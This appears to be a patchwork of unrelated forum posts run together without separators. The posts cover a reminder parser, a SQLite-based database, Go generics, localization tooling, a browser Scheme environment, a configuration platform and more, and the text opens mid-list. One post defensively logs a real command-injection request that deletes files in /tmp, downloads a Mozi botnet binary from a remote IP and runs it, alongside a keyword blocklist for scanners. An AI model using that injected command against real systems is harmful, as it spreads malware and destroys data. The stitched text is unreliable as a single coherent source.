- I've consulted with non-developers about their ideas, helping them understand what it'll take to implement them,
- I'm currently building the control panel (front and back-end) of an embedded (ARM-based) wifi access point,
- I'm planning educational workshops for our community to learn (cram) different technologies and how they can quickly be put to use for different benefits,
- I read 600+ articles, blog entries, and stories each month about what the tech world is doing. (I'm pretty well informed!)
- I can tell good design from bad design. Aesthetics are not lost on me.
- I have a family (two kids) and juggle a hectic work-life balance (volunteering, full-time gig, forming a startup, social life?) that's gradually improving.
If you're interested, there's some more information about me at http://nobulb.com/personas/.
So if there's something I can help you with, just ask here or @mikegreenberg on Twitter. Be specific about what you're trying to fix/solve/accomplish: the more details you provide, the better I can help you out. Your request should also be something I can do within 10-15 minutes (a soft time limit so I can spread the love a little quicker).
Last time, the response was overwhelming and I was still answering questions days later (because I wanted to). If you want to get your question answered sooner rather than later, your request should be thoughtful, sincere, researched, and considerate of other people who might want help, too.
Cheers!
PS: This is how it went the last few times I did this:
http://news.ycombinator.com/item?id=2767448
http://news.ycombinator.com/item?id=2649226
http://news.ycombinator.com/item?id=2544886
PPS: I'm not asking for anything in return, however, there IS one way you could show your appreciation if you felt the need. I'm working on a project and currently doing some validation. If you would consider taking a short 2-minute survey, I would be quite appreciative.
Survey: http://idjump.wufoo.com/forms/online-identity-and-you/
Followup in two days
Followup on November 23rd at 3pm
Remind me about my dentist appointment at 3.30pm on December 12th 2008
Clearly there can be lots of subtle variations on what exactly gets entered in these sorts of scenarios, which makes for a potentially tricky/interesting problem.
Listening to a podcast recently, I heard Joel Spolsky mention that people with no knowledge of compilers tend to tackle a parsing problem like this the 'hard way' (i.e. using regexes, searching strings, etc.) when they might be better off with a lexer/parser approach. I have no knowledge of compilers, so my thinking right now is to scan for keywords and then for things that look like dates using regexes.
Has anyone implemented anything that does this sort of command processing, and do you have any tips or tools to share? My application is in Rails, but I am willing to experiment. I just don't want many hundreds of lines of code testing for all sorts of strange conditions, making for a brittle maintenance nightmare!
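For what it's worth, here's a minimal sketch of the keyword-plus-regex idea (in TypeScript rather than Ruby, with made-up patterns that only cover the "in N days/weeks" shape). In Ruby, the Chronic gem already handles the natural-language date half of this.

// Sketch: scan for a relative-offset phrase; everything before it is the action.
type Reminder = { action: string; when: Date };

const UNIT_MS: Record<string, number> = {
  minute: 60_000, hour: 3_600_000, day: 86_400_000, week: 604_800_000,
};
const WORDS: Record<string, number> = { a: 1, an: 1, one: 1, two: 2, three: 3 };

function parseReminder(input: string, now = new Date()): Reminder | null {
  // Relative offsets: "in two days", "in 3 weeks", ...
  const m = input.match(/\bin\s+(\d+|a|an|one|two|three)\s+(minute|hour|day|week)s?\b/i);
  if (m) {
    const n = WORDS[m[1].toLowerCase()] ?? parseInt(m[1], 10);
    return {
      action: input.slice(0, m.index).trim(),
      when: new Date(now.getTime() + n * UNIT_MS[m[2].toLowerCase()]),
    };
  }
  // Absolute dates ("on November 23rd at 3pm") would get their own pattern here,
  // or be handed off to a real date parser.
  return null;
}

console.log(parseReminder("Followup in two days")); // { action: "Followup", when: ... }

Past a handful of patterns this does become the regex soup described above, which is the point where a small grammar or an existing date-parsing library starts to pay off.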
The land is located 35 miles from downtown Chicago and 25 miles from O'Hare airport. It's smack-dab in the middle of suburbia and there is a Menards within walking distance. http://goo.gl/6tjC8g
If the idea is interesting enough, I'll even build you a shed or a cabin (out of 2x4s; nothing fancy).
The land will include the following amenities, all of which are available at no cost (for really cool projects):
--well water (within reason)
--septic field
--electricity (within reason)
--wifi
--fenced and unfenced acreage
Starting next year, there will be bees, flowers, goats, chickens, dogs, and alpacas on the land. And very likely a mini-donkey, to keep the coyotes at bay.
Feel free to suggest anything you actually want to implement. Or just suggest ideas that others may want to run with. Other than providing power and internet, I don't have the time to help with anything else.
Some ideas my wife and I have come up with:
--real-life Farmville with wifi robots
--tiny, automated combines
--experimental wind turbine development
--cubesat ground stations (not really ag-related, but still cool)
--goat-milking bots
This is no strings attached. We just want to encourage really interesting technical-agricultural projects. Let a thousand flowers bloom.
Almost a year ago, I introduced Paradict [1], my take on multi-format streaming serialization. Given its readability, the Paradict text format turns out to be an interesting data format for config files. But using Paradict to manage config files would have cluttered its programming interface and made it confusing for users who already have alternative libraries (TOML, INI file, etc.) dedicated to config files. So I used Paradict as a dependency for KvF (Key-value file format) [2], a new project of mine that focuses on config files with sections.
With its compact binary format, I thought Paradict would be an efficient dependency for a new project that would rely on I/O functions (such as Open, Read, Write, Seek, Tell and Close) to implement a minimalistic yet reliable persistence solution. But that was before I learned that "files are hard" [3]. SQLite with its transactions, BLOB data type and incremental I/O for BLOBs seemed like the right giant to stand on for my new project.
Jinbase started small as a key-value store and ended up as a multi-model embedded database that pushes the boundaries of what we usually do with SQLite. The first transition, to the second data model (the depot), happened when I realized that the key-value store was not well suited to cases where a unique identifier should be automatically generated for each new record, saving the user the burden of providing an identifier that might accidentally collide with, and thus overwrite, an existing record. After that, I implemented a search capability that accepts UID ranges for the depot store, timespans (records are automatically timestamped) for both the depot and key-value stores, and, for the key-value store, GLOB patterns and number ranges over string and integer keys.
The queue and stack data models emerged as solutions for use cases where records must be consumed in a specific order. A typical record would be retrieved and deleted from the database in a single transaction unit.
Since SQLite is used as the storage engine, Jinbase supports the relational model de facto. For convenience, all tables related to Jinbase internals are prefixed with "jinbase_", making Jinbase a useful tool for opening legacy SQLite files to add new data models that will safely coexist with the ad hoc relational model.
All four main data models (key-value, depot, queue, stack) support Paradict-compatible data types, such as dictionaries, strings, binary data, integers, datetimes, etc. Under the hood, when the user initiates a write operation, Jinbase serializes (except for binary data), chunks, and stores the data iteratively. A record can be accessed not only in bulk, but also with two levels of partial access granularity: the byte-level and the field-level.
While SQLite's incremental I/O for BLOBs is designed to target an individual BLOB column in a row, Jinbase extends this so that, for each record, incremental reads cover all chunks as if they were a single unified BLOB. For dictionary records only, Jinbase automatically creates and maintains a lightweight index consisting of pointers to root fields, which allows the contents of an individual field to be extracted from an arbitrary record and automatically deserialized before being returned.
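To illustrate the unified-BLOB idea (a conceptual sketch in TypeScript, not Jinbase's actual code): once a record is stored as chunks, a byte-range read just walks the chunks and copies the overlapping slices.

// Reads [offset, offset + length) across a record's chunks as if they
// were one contiguous BLOB.
function readRange(chunks: Uint8Array[], offset: number, length: number): Uint8Array {
  const out = new Uint8Array(length);
  let written = 0;
  let pos = 0; // absolute offset of the current chunk's first byte
  for (const chunk of chunks) {
    if (written === length) break;
    const start = Math.max(offset - pos, 0);
    if (start < chunk.length) {
      const take = Math.min(chunk.length - start, length - written);
      out.set(chunk.subarray(start, start + take), written);
      written += take;
    }
    pos += chunk.length;
  }
  return out.subarray(0, written); // shorter if the record ends early
}

Field-level access then reduces to the same operation: the index maps a root field to its byte span, which is read and deserialized.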
The most obvious use cases for Jinbase are storing user preferences, persisting session data before exit, order-based processing of data streams, exposing data for other processes, upgrading legacy SQLite files with new data models and bespoke data persistence solutions.
Jinbase is written in Python and available on PyPI, and you can play with the examples in the README.
Let me know what you think about this project.
[1] https://news.ycombinator.com/item?id=38684724
I've recently started logging pings to my services. A LOT of servers constantly probe me, checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries; it looks like this:
[
  {
    "offense": "boaform/admin/formLogin?username=ec8&psd=ec8",
    "ipAddress": "125.47.68.164"
  },
  {
    "offense": ".env",
    "ipAddress": "52.224.55.198"
  },
  {
    "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.115.18:53153/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1",
    "ipAddress": "115.58.115.18"
  }
]
Maybe we don't filter by IP address, and instead filter requests based on known strings (or regexes). That's what I'm currently doing, e.g. if the request includes '.env': blocked!
I'd love to implement a more aggressive strategy rather than a reactive one. Right now I find myself going through server logs and adding new 'keywords' to the 'banned list'.
Something like an 'ad blocklist' that we can use as middleware in our HTTP applications.
If something exists already, kindly point me to a GitHub repo.
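In the meantime, the reactive version is only a few lines of middleware. A sketch with Node's built-in http module (the patterns here are illustrative, not a vetted blocklist):

import http from "node:http";

// Illustrative patterns only; a real list would be community-maintained.
const banned: RegExp[] = [/\.env\b/i, /\bformLogin\b/i, /setup\.cgi/i, /\bMozi\b/i];

const server = http.createServer((req, res) => {
  let url = req.url ?? "";
  try { url = decodeURIComponent(url); } catch {} // attackers URL-encode payloads
  if (banned.some((re) => re.test(url))) {
    // Optionally log req.socket.remoteAddress to the offenders dataset here.
    res.writeHead(403).end();
    return;
  }
  res.writeHead(200).end("ok");
});

server.listen(8080);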
At some point in the negotiation he blatantly said: "I don't trust you, I would like to split payment into monthly installments and be able to cancel anytime, no strings attached." Despite this massive red flag I decided to go through with it (won't do that again, ever), and we signed a contract with that clause, which turned out to be my lifesaver.
The guy was a complete [REDACTED]. We were delivering progress way ahead of schedule, yet he was always complaining about one thing or another, kept adding requirements that were never agreed on, and threatened to dump the whole thing because of the clause.
Two months in we had enough. I called a meeting with him and his team, then proceeded to invoke the clause in my favor. He was very pissed off to find out that it could actually be used against him, but ¯\_(ツ)_/¯. We parted ways that evening and haven't looked back since. So long, man; let's never meet again.
A common workaround proposed is to use an interface. In many cases, it's possible to find an operation common to all the types to be supported; in the worst case, an empty interface can be used.
This doesn't satisfy many Go programmers, so a proposal for generic types has been made, containing the contract keyword:
contract Ordinal(t T) {
    t < t
}
So a contract looks basically like an interface, except that instead of requiring a type to implement certain methods, it requires the type to support the use of certain operations.
When I think of operations and the types they apply to in Go, the following categories come to mind:
1. Equality, expressed by == and !=, which is supported by most Go types.
2. +, which adds up numbers and concatenates strings.
3. Other operations for arithmetic and comparison: -, *, /, %, <, >, <=, >=.
4. Accessors and qualifiers: . and []
Complaints about the lack of generics in Go are often heard from programmers who want to implement numeric libraries. They basically want a type that supports the operations of the first three categories, which is essentially the set of numeric types: integers, floating-point numbers, and complex numbers.
So an abstract "numeric" or "number" type could eliminate a lot of the use cases for contracts. Is this an option being considered? Or is there just no benefit over using float64 for numeric computations?
Eight years ago, I worked at a company that was developing a not-so-small system for lawyers, and it was extremely painful for me as a developer to handle the localization of the app.
The process looked like this:
1. Add many keys to the code like "transport_form_name_input_label," "transport_form_car_input_label," etc.
2. Run some extractor to extract the keys from the code.
3. Open the target language data file in an app called Poeditor
4. Import the extracted keys.
5. Find and translate the new values - This was super painful since there were many untranslated keys, and it was hard to find the new ones.
6. Repeat from step 3 - we were translating into 2 versions of the Czech language because of different customer types.
The most common bug was leaving some key untranslated, because developers always kept this as the last part of the feature task.
Later on, we started to think about how to improve this process so the localization doesn't rely on developers.
However, we found out that designers, project managers, and product managers cannot work with Git, and it's also hard for them to find out which keys are rendered where in the system.
It was impossible to simply transfer the task to them.
So my idea was to enable them to simply click on the strings in the actual translated app, give them a simple dialog, and let them translate the text exactly in the place where it's rendered.
Four years later, I got to implement this idea as a part of my master's thesis, and later on, I founded Tolgee.
You can quickly deploy the Tolgee app with Docker / Docker Compose.
It's fully open source (Apache 2.0); we only have one enterprise folder under a different license.
The thing is, I am OK with PHP/MySQL. With this app, I want to:
- Learn how to code in MVC architecture.
- Learn to design/implement a very basic design using CSS/jQuery (no Photoshop; I am no good at it, and my job does not give me time to learn it).
- Make it scalable, i.e. it should withstand high traffic. (I am not saying it will receive traffic, but I want to learn to build it with minimum resources, optimized as far as possible.)
Can someone guide me on where to go from here for the above three? I get roughly 2 hours daily after my job, and weekends (Sat/Sun) are free. Although I love to spend them with family and friends, you can assume 11-12 hours of free time per weekend.
I want to finish this thing in 2 months. The coding is not too complicated; what I want is to implement it with elegance.
Where should I start? How should I proceed?
for each function,
- first write out its algorithm in comments,
- then implement that.
It seems like that programming style can result in higher-quality code with fewer bugs.
As an example, let's implement a simple "ends_with?" string utility function. The function takes two strings and returns whether the first ends with the second:
bool endsWith( const char* haystack, const char* ending )
Following our new programming style, we first write out its implementation in comments:
bool endsWith( const char* haystack, const char* ending )
{
    // find the end of [haystack] and [ending].
    // if [haystack] is shorter than [ending] then it can't end with [ending], so return false.
    // walk backwards through both strings.
    // if a character differs, return false.
    // otherwise, [haystack] ends with [ending], so return true.
}
Pretty straightforward. And now we can implement the function in an equally straightforward way:
bool endsWith( const char* haystack, const char* ending )
{
    // find the end of [haystack] and [ending].
    const char *haystackEnd = haystack;
    const char *endingEnd = ending;
    while( *haystackEnd )
        haystackEnd++;
    while( *endingEnd )
        endingEnd++;

    // if [haystack] is shorter than [ending] then it can't end with [ending], so return false.
    if( haystackEnd - haystack < endingEnd - ending )
        return false;

    // walk backwards through both strings.
    while( endingEnd != ending )
    {
        --endingEnd;
        --haystackEnd;

        // if a character differs, return false.
        if( *endingEnd != *haystackEnd )
            return false;
    }

    // otherwise, [haystack] ends with [ending], so return true.
    return true;
}
What is interesting about this style is that the result will usually be simple to read and understand. The key is to write out the function's comments first, not last. Is this a common programming style?
A friend of mine uses this technique in his game engine to great effect. The engine's source code is beautiful, mostly because each algorithm is simple and can be understood by reading clear English.
The assets consist of JavaScript files, PHP templates, Handlebars templates, etc. I don't want to assume I have control over DNS or even the web server.
What is a good design pattern and version control flow to handle translations?
Should I use "themes" (folders, basically) and do automatic translation of text? And is there a program to do automatic translation of images?
When I push a changeset, some of the views or strings may have changed. What is a good way to detect the diffs, so I can automatically update the translations with Google Translate during the build process and then file issues for the translators to do just the new strings?
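One build-time approach, sketched here with hypothetical file names: keep the previous extraction of source strings around, diff the key/value maps, and send only the added or changed keys to machine translation and to the translators.

import { readFileSync } from "node:fs";

// Hypothetical files: the last-translated extraction vs. the fresh one.
type Strings = Record<string, string>;
const before: Strings = JSON.parse(readFileSync("strings.prev.json", "utf8"));
const after: Strings = JSON.parse(readFileSync("strings.json", "utf8"));

const added = Object.keys(after).filter((k) => !(k in before));
const changed = Object.keys(after).filter((k) => k in before && before[k] !== after[k]);

// Only `added` and `changed` go to Google Translate / translator issues.
console.log({ added, changed });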
Although the basic functionality is implemented, there are some unfortunate gaps; in particular, functions do not support recursion (I don't know how to implement it). Functions also don't support return statements, loops don't support break, etc. (these should be possible, I'm just a bit tired).
Error handling is also sketchy, as there is currently no line number information, making it difficult to locate errors when the program is long. There is also a lack of composite data types (such as objects or arrays).
I would like to share this project with you and welcome any suggestions or contributions to improve it, especially to solve the problem of functions not supporting recursion! If you're interested in implementing these features, feel free to visit my GitHub repository at [Toc](https://github.com/huanguolin/toc) and submit a PR. I welcome discussion and feedback!
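On the recursion point, the standard trick (sketched below as generic interpreter code, not Toc's actual implementation) is to bind the function's name in the environment the closure captures before the body is ever evaluated, so a call to itself resolves through the scope chain:

// Environments form a chain; lookups walk toward the root.
class Env {
  private vars = new Map<string, unknown>();
  constructor(private parent?: Env) {}
  define(name: string, value: unknown) { this.vars.set(name, value); }
  lookup(name: string): unknown {
    if (this.vars.has(name)) return this.vars.get(name);
    if (this.parent) return this.parent.lookup(name);
    throw new Error(`undefined variable: ${name}`);
  }
}

// When evaluating `fun fib(n) { ... fib(n - 1) ... }`:
//   1. build the closure, capturing the *defining* environment `env`;
//   2. env.define("fib", closure) BEFORE any call happens;
//   3. each call evaluates the body in `new Env(capturedEnv)`, so the inner
//      `fib` is found via the parent chain, and recursion just works.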
About the project
Lambda Quest is a live-coding environment in your browser.
When building Lambda Quest, I decided to go with native in-browser ES6 modules, without any compilation. It's really refreshing to just write modern JS and not have to deal with Webpack.
Scheme + Emscripten
The core of the app is a Scheme interpreter called Gambit. It's originally a C program that was compiled to JavaScript via Emscripten. It runs in a WebWorker and communicates with the main thread via postMessage.
To interact with Scheme, I've added the Monaco Editor. It's the same open-source editor that powers VS Code. Whenever you edit the Scheme code and it's syntactically correct, it is re-evaluated live, so the results are immediately visible on a canvas.
Canvas
Speaking of Canvas, the rendering is fully asynchronous. Scheme puts Canvas method calls into an async queue. There's a requestAnimationFrame loop running in the background that picks up any pushes to the queue. This makes animations possible through things like `(sleep 0.5)`.
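Roughly (the shape of the idea, not Lambda Quest's exact code): the worker posts drawing commands, and the main thread drains them once per frame.

const worker = new Worker("scheme.js"); // hypothetical file name

// Commands from the Scheme worker pile up; a rAF loop drains them.
type Command = { method: string; args: unknown[] };
const queue: Command[] = [];
worker.onmessage = (e: MessageEvent<Command>) => queue.push(e.data);

const canvas = document.querySelector("canvas") as HTMLCanvasElement;
const ctx = canvas.getContext("2d")!;

function drain() {
  for (const { method, args } of queue.splice(0)) {
    (ctx as any)[method](...args); // e.g. { method: "fillRect", args: [0, 0, 10, 10] }
  }
  requestAnimationFrame(drain);
}
requestAnimationFrame(drain);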
Web Audio support
In addition to Canvas, I've implemented Web Audio support. So you can live-code music now!
Adding Web Audio wasn't trivial because the Gambit interpreter is running in a Web Worker. So I have to send messages between the worker and the main JS thread to access any browser APIs.
Canvas was easy to implement, because it's mostly procedural calls like `fillRect`, `stroke` etc. So I'm just sending commands from Lisp to JS.
Web Audio, on the other hand, is about creating trees of audio nodes. E.g. you create an Oscillator node and connect it to a Gain node, and finally connect the Gain node to a Destination node (output). Also you can set parameters on each node (e.g. the frequency of an oscillator).
This all means that Scheme needs a way to reference created nodes. However, I cannot send a node directly in a message from JS. Only atomic values like strings and numbers. To circumvent this limitation, I've created a registry of nodes in JS which can be accessed by id.
Scheme, when calling a Web Audio method, provides an id to store the result in. Also if it passes an id in one of the arguments, JavaScript looks it up in the registry and makes the call on the corresponding node.
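Something like this (the ids and message shapes are illustrative, not the actual protocol):

// Registry of audio nodes on the main thread, addressable by id.
const registry = new Map<string, AudioNode>();
const audioCtx = new AudioContext();

// e.g. message { op: "create", kind: "oscillator", id: "osc1" }
function create(kind: string, id: string) {
  const node = kind === "oscillator" ? audioCtx.createOscillator() : audioCtx.createGain();
  registry.set(id, node);
}

// e.g. message { op: "call", id: "osc1", method: "connect", argIds: ["gain1"] }
function call(id: string, method: string, argIds: string[]) {
  const target = registry.get(id)!;
  const args = argIds.map((a) => registry.get(a)!); // resolve referenced nodes
  (target as any)[method](...args); // i.e. osc1.connect(gain1)
}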
setTimeout as a Scheme macro
Web Audio is not fun if you can't program timed events for it. E.g. a sequence of notes, or a volume envelope that changes over time. So I had to make the Scheme code asynchronous.
Scheme, just like JavaScript, is single-threaded and "synchronous". It needs a second process to tell it when to run a delayed call to achieve asynchronous behavior.
I've implemented a macro – https://github.com/katspaugh/lambda.quest/blob/main/scheme/w... – (which is btw my first macro ever) to put a Scheme callback in a JS `setTimeout`.
Macros, for me, are such a mind-blowing thing. It was amazing to code one purposefully, to achieve a practical goal.
GitHub API and OAuth
You can save your Scheme creations as gists on GitHub. I've implemented GitHub OAuth with a serverless worker on CloudFlare. The worker, of course, is also written in JS. All my projects are hosted on CloudFlare btw, it's amazing.
Preact
Finally, I've used Preact and HTM for a React-like UI rendering. HTM is basically JS template strings that look like JSX and spit out DOM trees. Pretty neat, although a bit hard to edit.
GitHub
All the code is open-source (MIT) and can be read on GitHub: https://github.com/katspaugh/lambda.quest
Pull requests and feedback are very welcome. Thanks for reading!
I am working on a fun little React.js project that has been getting more developer interest than I initially expected, and I'm not exactly sure which license is the best for both users and maintainers.
I've created a simple content creator tool with a pretty nice interface, and it's free to anyone with no strings attached. I've noticed that there isn't much in the way of UI editors for React anymore, and the ones that do exist have become vendor-locked and have funky, tight wording within their licenses.
Now that my little side project has gotten a few views and contributors, I would like to make sure that we have an air-tight license that is in the best interest of both developers and of us contributors and maintainers.
I don't believe in putting "rate limits" and such within basic UI component libraries like a number of React content UI kits out there. But I'd also like to protect our own work from said UI kits forking our own code and then trying to implement those types of terms on their users.
I appreciate everyone's input and opinions!
Thank you in advance :)
One of the features I am planning to implement later on is limiting the number of votes a user can give per submission. I am guessing I will have to save data in a table whose schema would look like (username, submissionid, votedupordown) and parse those rows to allow or disallow access to the voting functionality.
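A sketch of that check (the names are made up; in SQL, a UNIQUE constraint on (username, submissionid) enforces the same rule at the database level):

// One vote per user per submission.
type Vote = { username: string; submissionId: number; direction: "up" | "down" };
const votes = new Map<string, Vote>(); // stand-in for the votes table

function castVote(v: Vote): boolean {
  const key = `${v.username}:${v.submissionId}`;
  if (votes.has(key)) return false; // already voted: disallow
  votes.set(key, v);
  return true;
}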
One more thing I have in mind is integration of either Bing or Google Maps (depending on whichever gives me the most free queries per month) and SignalR to show submissions in real time as they come up...
What am I making? I have no idea. This could be nothing or it could be something. Source may be released on github when I'm happy with it, right now it's probably rather messy but I do try to keep it neat.
Your thoughts? Ideas? Suggestions?
Also changed is the INameable interface, which is now only a getter for Name, and now supports both being a normal string property (getter and setter) AND redirecting to another property.
In other words, you may have no place for a Name property in your content model, but you want the content to be described by a certain field in the UI when listing. The User class is such an example.
Then you can implement it as such:
string INameable.Name => Username;
public string Username { get; set; }
Oh, and that redirection is done through a very lightweight MSIL disassembler. (NameExpressionParser)
https://github.com/cloudy-cms/Cloudy.CMS
I made this as a little project for myself. I've been a fan of regexes, and found that I'm often the only person around me who has taken the time to learn them, so I find myself writing regexes for other people. I wanted to make this as a way for anyone to harness the power of regex for a lot of common operations, without needing to understand regex, blindly copy-paste regexes from the internet, or implement far less efficient string parsing methods to do what a quick regex could.
The idea is for the entire thing to be language agnostic, with an ever-growing list of supported regexes AND supported languages, expandable by the community, and deployed to any package manager people are willing to support.
Tell me what you think!
Side note: This is my first really "open source" project, so if you see any faux pas regarding contributions, the license, etc., please please let me know so I can learn and update things.
Briefly, about this implementation:
1. it is Grisu-based, but not exactly Grisu2;
2. for now it produces only a raw ASCII representation, e.g. -22250738585072014e-324, without a dot or a '\0' at the end;
3. compared to Ryu, it has significantly smaller code size and spends fewer clock cycles per digit, but is slightly inferior as a whole because it generates a longer ASCII representation.
Now I would like to get feedback, assess how much demand there is, and collect suggestions for further improvements. For instance, I think it is reasonable to implement conversion with a specified precision (i.e., with a specified number of digits), but not to provide a printf-like interface.
The benchmark source code: https://github.com/leo-yuriev/dtoa-benchmark
The d2a() implementation: https://github.com/leo-yuriev/erthink/blob/master/erthink_d2a.h
The test source code: https://github.com/leo-yuriev/erthink/blob/master/test/d2a.cxx
Any suggestions are welcome!
What common patterns, conventions, or idioms do you use to implement options in your shell scripts?
Examples of options I want to implement:
- [-h | --help] Prints a help message.
- [-t | --target] Points to a directory containing our automated tests.
- [-e | --env] Takes a string URI for the automated tests to run against (e.g. http://localhost:1234 or https://tst.mycloudenv.hn).
- [-q | --quiet] Suppresses output.
Capabilities:
- Long or short options.
- Options can appear in any order.
- Options are properly interpreted anywhere in the command, not just in the last position.
- Short options can be concatenated.
Essentially, I want these to be as professional and POSIX compliant as possible [0].
[0] https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
I wrote this because I wanted a queue with all the bells and whistles - searching, scheduling into the future, observability, and rate limiting - all the things that many modern task queue systems have.
But I didn't want to rewrite my app, which was already using SQS. And I was frustrated that many of the best solutions out there (BullMQ, Oban, Sidekiq) were language-specific.
So I made an SQS-compatible replacement. All you have to do is replace the endpoint using AWS' native library in your language of choice.
For example, the queue works with Celery - you just change the connection string. From there, you can see all of your messages and their status, which is hard today in the SQS console (and Flower doesn't support SQS).
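With the AWS SDK for JavaScript v3, for example, the swap looks roughly like this (the local URL and credentials are placeholders):

import { SQSClient, SendMessageCommand } from "@aws-sdk/client-sqs";

// Point the official SDK at the replacement instead of AWS.
const client = new SQSClient({
  region: "us-east-1",
  endpoint: "http://localhost:3001", // placeholder local endpoint
  credentials: { accessKeyId: "local", secretAccessKey: "local" },
});

async function main() {
  await client.send(new SendMessageCommand({
    QueueUrl: "http://localhost:3001/my-queue", // placeholder queue URL
    MessageBody: JSON.stringify({ job: "example" }),
  }));
}
main();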
It is written to be pluggable. The queue implementation uses SQLite, but I've been experimenting with RocksDB as a backend and you could even write one that uses Postgres. Similarly, you could implement multiple protocols (AMQP, PubSub, etc) on top of the underlying queue. I started with SQS because it is simple and I use it a lot.
It is written to be as easy to deploy as possible - a single Go binary. I'm working on adding distributed and autoscale functionality as the next layer.
Today I have search, observability (via Prometheus), unlimited message sizes, and the ability to schedule messages arbitrarily in the future.
In terms of monetization, the goal is to just have a hosted queue system. I believe this can be cheaper than SQS without sacrificing performance. Just as Backblaze and Minio have had success competing in the S3 space, I wanted to take a crack at queues.
I'd love your feedback!
Lightweight UI component tree definition syntax, DOM creation and differential updates using only vanilla JS data structures (arrays, iterators, attribute objects or objects with life-cycle functions, closures). By default it targets the browser's native DOM, but it supports arbitrary other target implementations in a branch-local manner, e.g. to define scene graphs for a canvas element as part of the normal UI tree. (A toy sketch of the array syntax follows the feature list below.)
Benefits:
- Use the full expressiveness of ES6 / TypeScript to define user interfaces
- No enforced opinion about state handling, very flexible
- Clean, functional component composition & reuse
- No source pre-processing, transpiling or string interpolation
- Less verbose than HTML / JSX, resulting in smaller file sizes
- Supports arbitrary elements (incl. SVG), attributes and events in uniform, S-expression based syntax
- Supports branch-local custom update behaviors & arbitrary (e.g. non-DOM) target data structures to which tree diffs are applied
- Suitable for server-side rendering and then "hydrating" listeners and components with life cycle methods on the client side
- Can use JSON for static components (or component templates)
- Optional user context injection (an arbitrary object/value passed to all component functions embedded in the tree)
- Default implementation supports CSS conversion from JS objects for style attribs
- Auto-expansion of embedded values / types which implement the IToHiccup or IDeref interfaces (e.g. atoms, cursors, derived views, streams etc.)
- Only ~5.5KB gzipped
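For a feel of the syntax, here is a toy version of the array convention (an illustration only, not the library's actual API):

// Hiccup-style trees: ["tag", attribs, ...children] arrays become DOM.
type Tree = string | [string, Record<string, string>, ...Tree[]];

function create(t: Tree): Node {
  if (typeof t === "string") return document.createTextNode(t);
  const [tag, attribs, ...children] = t;
  const el = document.createElement(tag);
  for (const [k, v] of Object.entries(attribs)) el.setAttribute(k, v);
  for (const c of children) el.appendChild(create(c));
  return el;
}

document.body.appendChild(
  create(["div", { class: "app" }, ["h1", {}, "Hello"], ["p", {}, "arrays all the way down"]])
);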
https://news.ycombinator.com/item?id=7535606-can_i_delete_my_skype_account
I think that would be fairly easy to implement and it could be easily made backward compatible by forwarding the old links to the new format. With a dash as separator it’s still possible to select the ID with a double click (at least on my system). I think that would be a great improvement. Thanks!
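Concretely, something like this (a sketch; the exact slug rules are guesses):

// Id first, then a dash, then the slugified title.
const slugify = (title: string) =>
  title.toLowerCase().replace(/[^a-z0-9]+/g, "_").replace(/^_+|_+$/g, "");

const itemUrl = (id: number, title: string) =>
  `https://news.ycombinator.com/item?id=${id}-${slugify(title)}`;

// Old links keep working: parseInt stops at the first non-digit, so both
// "7535606" and "7535606-can_i_delete_my_skype_account" yield 7535606.
const itemId = (idParam: string) => parseInt(idParam, 10);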
It's like a CMS but instead of only letting you set static content, you can insert arbitrary logic from the UI, including A/B tests and ML "loops".
I previously built a landing page optimization tool that let marketers define variants of their headline, CTA, cover image, etc, then used a genetic algorithm to find the best combination of them. They used my Chrome extension to define changes on DOM elements based on their unique CSS selector. But this broke when the underlying page changed and didn't work with sites that used CSS modules. Developers hated it.
I took a step back.
The problem I was trying to solve was making the page configurable by marketers in a way that developers liked. I decided to solve it from first principles and this led to Hypertune.
Here's how it works. You define a strongly typed configuration schema in GraphQL, e.g.
type Query {
  page(language: Language!, deviceType: DeviceType!): Page!
}

type Page {
  headline: String!
  imageUrl: String!
  showPromotion: Boolean!
  benefits: [String!]!
}

enum Language { English, French, Spanish }
enum DeviceType { Desktop, Mobile, Tablet }
Then marketers can configure these fields from the UI using our visual, functional, statically-typed language. The language UI is type-directed so we only show expression options that satisfy the required type of the hole in the logic tree. So for the "headline" field, you can insert a String expression or an If / Else expression that returns a String. If you insert the latter, more holes appear. This means marketers don't need to know any syntax and can't get into invalid states. They can use arguments you define in the schema like "language" and "deviceType", and drop A/B tests and contextual multi-armed bandits anywhere in their logic. We overlay live counts on the logic tree UI so they can see how often different branches are called.
You get the config via our SDK which fetches your logic tree once on initialization (from our CDN) then evaluates it locally so you can get flags or content with different arguments (e.g. for different users) immediately with no network latency. So you can use the SDK on your backend without adding extra latency to every request, or on the frontend without blocking renders. The SDK includes a command line tool that auto-generates code for end-to-end type-safety based on your schema. You can also query your config via the GraphQL API.
If you use the SDK, you can also embed a build-time snapshot of your logic tree in your app bundle. The SDK initializes from this instantly then fetches the latest logic from the server. So it'll still work in the unlikely event the CDN is down. And on the frontend, you can evaluate flags, content, A/B tests, personalization logic, etc, instantly on page load without any network latency, which makes it compatible with static Jamstack sites.
I started building this for landing pages but realized it could be used for configuring feature flags, in-app content, translations, onboarding flows, permissions, rules, limits, magic numbers, pricing plans, backend services, cron jobs, etc, as it's all just "code configuration".
This configuration is usually hardcoded, sprawled across json or yaml files, or in separate platforms for feature flags, content management, A/B testing, pricing plans, etc. So if a PM wants to A/B test new onboarding content, they need a developer to write glue code that stitches their A/B testing tool with their CMS for that specific test, then wait for a code deployment. And at that point, it may not be worth the effort.
The general problem with having separate platforms is that all this configuration naturally overlaps. Feature flags and content management overlap with A/B testing and analytics. Pricing plans overlap with feature flags. Keeping them separate leads to inflexibility and duplication and requires hacky glue code, which defeats the purpose of configuration.
I think the solution is a flexible, type-safe code configuration platform with a strongly typed schema, type-safe SDKs and APIs, and a visual, functional, statically-typed language with analytics, A/B testing and ML built in. I think this solves the problem with having separate platforms, but also results in a better solution for individual use cases and makes new use cases possible.
